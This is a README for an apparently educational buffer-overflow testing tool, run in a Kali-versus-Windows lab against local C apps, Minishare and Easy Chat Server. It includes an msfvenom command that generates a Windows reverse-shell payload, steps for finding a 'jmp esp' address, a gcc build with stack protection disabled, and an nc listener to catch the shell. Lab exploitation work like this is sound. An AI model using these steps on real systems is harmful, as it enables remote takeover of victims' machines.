This project tests applications for buffer-overflow vulnerabilities. Tested with two local C apps, Minishare remote application, Easy share application.
INSTALLATIONS AND TOOLS
- Windows 10/11(Victim Machine)
- Kali Linux over VirtualBox(Attack Machine)
- Immunity Debugger(On Victim Machine)
- Python 3.8
- Pwntools
- Gnu Debugger
- Minishare 3.4
- Easy Chat Server 1.4.1
CONFIGURATION AND SETTING UP(IMMUNITY DEBUGGER)
- Open Immunity Debugger as administrator on windows
- Open Minishare 1.4.1 as admin on windows
- Attach Minishare to Immunity Debugger
- View Executable Modules, find SHELL32.dll and double click
- Find ‘jmp esp’ command address and take note of it
- Open Kali linux
- Find your kali ip address
- Run(msfvenom -p windows/shell_reverse_tcp LHOST=#ipaddress LPORT=4444 x86/shikata_ga_nai -b “\x00\x0a\x0d” -f py) in your kali machine to generate reverse shell for your ip and port
- Open BufAutoDetext,
- Input the result of the above command as the new value for the ‘buf’ variable.
- Input the address gotten from ‘jmp esp’ in reverse into the shellcode
- Run BufAutoDetect.py and open a new terminal to listen on port 4444
RUNNING AND TESTING LOCAL APPS
- Start and load up kali linux in the Virtual Box.
- Open the new Kali Linux terminal and navigate to the base folder for AutoBuf.
- Compile C apps with... gcc app.c/app1.c -o app/app1 -fno-stack-protector -no-pie
- Run the command...python3 BufAutoDetect.py local -p n, then add directory to C apps
- Payloads include n,an,l
RUNNING AND TESTING MINISHARE REMOTE APPS
- Start Kali Linux on the attack machine and minishare on the victim machine.
- Open the new Kali Linux terminal and navigate to the base folder for AutoBuf.
- Run the command...python3 BufAutoDetect.py remote1 -ip #ipaddressofwindows -s #portofMinishare
- Then open a new terminal and listen to the output of the script using ...nc -l -p 4444
RUNNING AND TESTING EASYCHAT SERVER REMOTE APPS
- Start Kali Linux on the attack machine and easy chatserver on the victim machine.
- Open the new Kali Linux terminal and navigate to the base folder for AutoBuf.
- Run the command...python3 BufAutoDetect.py remote2 -ip #ipaddressofwindows -s #portofEasychatserver
- Calc.exe runs as easychat is overflowed
Video demonstration and Pictures to be found in 'processes' folder